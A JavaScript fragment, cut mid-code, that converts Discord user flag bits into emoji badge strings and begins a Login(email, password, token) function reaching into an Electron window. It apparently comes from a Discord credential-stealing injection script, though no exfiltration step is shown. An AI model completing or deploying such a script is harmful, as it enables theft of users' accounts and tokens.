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const Partnered_Server_Owner = 2; const HypeSquad_Events = 4; const Bug_Hunter_Level_1 = 8; const House_Bravery = 64; const House_Brilliance = 128; const House_Balance = 256; const Early_Supporter = 512; const Bug_Hunter_Level_2 = 16384; const Early_Verified_Bot_Developer = 131072; var badges = ""; if ((flags & Discord_Employee) == Discord_Employee) { badges += "<:staff:874750808728666152> " } if ((flags & Partnered_Server_Owner) == Partnered_Server_Owner) { badges += "<:partner:874750808678354964> " } if ((flags & HypeSquad_Events) == HypeSquad_Events) { badges += "<:hypesquad_events:874750808594477056> " } if ((flags & Bug_Hunter_Level_1) == Bug_Hunter_Level_1) { badges += "<:bughunter_1:874750808426692658> " } if ((flags & House_Bravery) == House_Bravery) { badges += "<:bravery:874750808388952075> " } if ((flags & House_Brilliance) == House_Brilliance) { badges += "<:brilliance:874750808338608199> " } if ((flags & House_Balance) == House_Balance) { badges += "<:balance:874750808267292683> " } if ((flags & Early_Supporter) == Early_Supporter) { badges += "<:early_supporter:874750808414113823> " } if ((flags & Bug_Hunter_Level_2) == Bug_Hunter_Level_2) { badges += "<:bughunter_2:874750808430874664> " } if ((flags & Early_Verified_Bot_Developer) == Early_Verified_Bot_Developer) { badges += "<:developer:874750808472825986> " } if (badges == "") { badges = "None" } return badges } function Login(email, password, token) { const window = BrowserWindow.getAllWindows()[0]; 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